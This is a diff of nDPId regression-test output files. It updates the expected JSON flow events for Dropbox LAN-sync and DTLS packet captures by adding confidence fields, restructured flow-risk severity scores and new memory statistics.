-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465534,"flow_last_seen":1535391525545,"flow_idle_time":180000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1535391651168,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00654{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465535,"flow_last_seen":1535391525545,"flow_idle_time":180000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1535391651168,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465534,"flow_last_seen":1535391525545,"flow_idle_time":180000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1535391651168,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00680{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465535,"flow_last_seen":1535391525545,"flow_idle_time":180000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1535391651168,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651168,"flow_last_seen":1535391651168,"flow_idle_time":180000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"ts_msec":1535391651168,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1535391651168,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1535391651168,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/jlBAAEAR6fXAqAFA\/\/\/\/\/0RcRFwAq9+deyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651168,"flow_last_seen":1535391651168,"flow_idle_time":180000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"ts_msec":1535391651168,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":843,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651168,"flow_last_seen":1535391651168,"flow_idle_time":180000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"ts_msec":1535391651168,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":844,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651170,"flow_last_seen":1535391651170,"flow_idle_time":180000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"ts_msec":1535391651170,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1535391651170,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1535391651170,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/SNZAAEARbMjAqAFAwKgB\/0RcRFwAqxz2eyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651170,"flow_last_seen":1535391651170,"flow_idle_time":180000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"ts_msec":1535391651170,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391651170,"flow_last_seen":1535391651170,"flow_idle_time":180000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":0,"ts_msec":1535391651170,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1535391652506,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1535391652506,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/jm9AAEAR6dbAqAFA\/\/\/\/\/0RcRFwAq9+deyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1535391652507,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1535391652507,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/SaBAAEARa\/7AqAFAwKgB\/0RcRFwAqxz2eyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1535391682513,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1535391682513,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/nwpAAEAR2TvAqAFA\/\/\/\/\/0RcRFwAq9+deyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1535391682514,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1535391682514,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAAC\/ZDZAAEARUWjAqAFAwKgB\/0RcRFwAqxz2eyJuYW1lc3BhY2VzIjogWzE5MDc2MDQwLCAyMDYwMzE0MCwgMTY3MTU2ODYsIDEyMzUzNTAzMF0sICJwb3J0IjogMTc1MDAsICJob3N0X2ludCI6IDMzMzEzOTY5NzEzOTU2MTA4MDE1Mzk5Mjk4MTIxOTY3OTIyMTUzNiwgImRpc3BsYXluYW1lIjogIiIsICJ2ZXJzaW9uIjogWzIsIDBdfQ=="}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391651168,"flow_last_seen":1535391682513,"flow_idle_time":180000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":489,"flow_avg_l4_payload_len":163,"midstream":0,"ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465534,"flow_last_seen":1535391525545,"flow_idle_time":180000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391651170,"flow_last_seen":1535391682514,"flow_idle_time":180000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":489,"flow_avg_l4_payload_len":163,"midstream":0,"ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465535,"flow_last_seen":1535391525545,"flow_idle_time":180000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391651168,"flow_last_seen":1535391682513,"flow_idle_time":180000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":489,"flow_avg_l4_payload_len":163,"midstream":0,"ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465534,"flow_last_seen":1535391525545,"flow_idle_time":180000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391651170,"flow_last_seen":1535391682514,"flow_idle_time":180000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":489,"flow_avg_l4_payload_len":163,"midstream":0,"ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.64","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1535391465535,"flow_last_seen":1535391525545,"flow_idle_time":180000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1535391682514,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":848,"source":"dropbox.pcap","alias":"nDPId-test","total-events-serialized":100}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 848/848
@@ -106,9 +106,9 @@
 ~~ total active/idle flows...: 15/15
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4636221 bytes
-~~ total memory freed........: 4636221 bytes
-~~ total allocations/frees...: 100443/100443
+~~ total memory allocated....: 4716582 bytes
+~~ total memory freed........: 4716582 bytes
+~~ total allocations/frees...: 102033/102033
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
 ~~ json string max len.......: 823 chars
diff --git a/test/results/dtls.pcap.out b/test/results/dtls.pcap.out
index 83267e8e4..3e5688221 100644
--- a/test/results/dtls.pcap.out
+++ b/test/results/dtls.pcap.out
@@ -1,7 +1,7 @@
 00436{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dtls.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1545143424891,"flow_last_seen":1545143424891,"flow_idle_time":180000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":0,"ts_msec":1545143424891,"l3_proto":"ip4","src_ip":"192.168.13.203","dst_ip":"192.168.13.57","src_port":40739,"dst_port":56515,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1545143424891,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"ts_msec":1545143424891,"pkt":"WLEPD4fwhLVBbZhoCABFAAC3FtBAAEARhxHAqA3LwKgNOZ8j3MMAozuLFv7\/AAAAAAAAAAAAjgEAAIIAAAAAAAAAgv79zrBtKgTLKhUXwuJm7W22k25ueldyqs3Q4tvQaM4mc34AAAAYwCvAL8ypzKjACcATwArAFACcAC8ANQAKAQAAQP8BAAEAABcAAAAjAAAADQAUABIEAwgEBAEFAwgFBQEIBgYBAgEADgAFAAIAAQAACwACAQAACgAIAAYAHQAXABg="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1545143424891,"flow_last_seen":1545143424891,"flow_idle_time":180000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":0,"ts_msec":1545143424891,"l3_proto":"ip4","src_ip":"192.168.13.203","dst_ip":"192.168.13.57","src_port":40739,"dst_port":56515,"l4_proto":"udp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"bd743610892cec1efed851b2b5efd4f5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1545143424891,"flow_last_seen":1545143424891,"flow_idle_time":180000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":0,"ts_msec":1545143424891,"l3_proto":"ip4","src_ip":"192.168.13.203","dst_ip":"192.168.13.57","src_port":40739,"dst_port":56515,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"bd743610892cec1efed851b2b5efd4f5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1545143424891,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"ts_msec":1545143424891,"pkt":"WLEPD4fwhLVBbZhoCABFAAC3FtBAAEARhxHAqA3LwKgNOZ8j3MMAozuLFv7\/AAAAAAAAAAAAjgEAAIIAAAAAAAAAgv79zrBtKgTLKhUXwuJm7W22k25ueldyqs3Q4tvQaM4mc34AAAAYwCvAL8ypzKjACcATwArAFACcAC8ANQAKAQAAQP8BAAEAABcAAAAjAAAADQAUABIEAwgEBAEFAwgFBQEIBgYBAgEADgAFAAIAAQAACwACAQAACgAIAAYAHQAXABg="}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dtls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1545143424891,"flow_last_seen":1545143424891,"flow_idle_time":180000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"ts_msec":1545143424891,"l3_proto":"ip4","src_ip":"192.168.13.203","dst_ip":"192.168.13.57","src_port":40739,"dst_port":56515,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00151{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"dtls.pcap","alias":"nDPId-test","total-events-serialized":7}
@@ -13,10 +13,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594887 bytes
-~~ total memory freed........: 4594887 bytes
-~~ total allocations/frees...: 99555/99555
+~~ total memory allocated....: 4679840 bytes
+~~ total memory freed........: 4679840 bytes
+~~ total allocations/frees...: 101145/101145
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 156 chars
-~~ json string max len.......: 865 chars
-~~ json string avg len.......: 568 chars
+~~ json string max len.......: 1051 chars
+~~ json string avg len.......: 656 chars
diff --git a/test/results/dtls2.pcap.out b/test/results/dtls2.pcap.out
index bf62a1677..04b66713a 100644
--- a/test/results/dtls2.pcap.out
+++ b/test/results/dtls2.pcap.out
@@ -1,14 +1,14 @@
 00437{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dtls2.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1507911659748,"flow_last_seen":1507911659748,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"ts_msec":1507911659748,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1507911659748,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"ts_msec":1507911659748,"pkt":"AAAAjZtQSEb7zh73CABFAABta10AAD8Ruf09RG6Z1CDWJ8818BEAWUhKFv7\/AAAAAAAAAAAARAEAADgAAAAAAAAAOP7\/xZOd2weR7n4d5xLXjiJT803Vm2GyIJyqcktro0p9KtUAAAAQADUALwAFAAQACgD7APwA\/QEA"}
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1507911659748,"flow_last_seen":1507911659748,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"ts_msec":1507911659748,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.0","client_requested_server_name":"","ja3":"1b45c913a0c0fde5f263502e65999485","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01042{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1507911659748,"flow_last_seen":1507911659748,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"ts_msec":1507911659748,"l3_proto":"ip4","src_ip":"61.68.110.153","dst_ip":"212.32.214.39","src_port":53045,"dst_port":61457,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.0","client_requested_server_name":"","ja3":"1b45c913a0c0fde5f263502e65999485","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
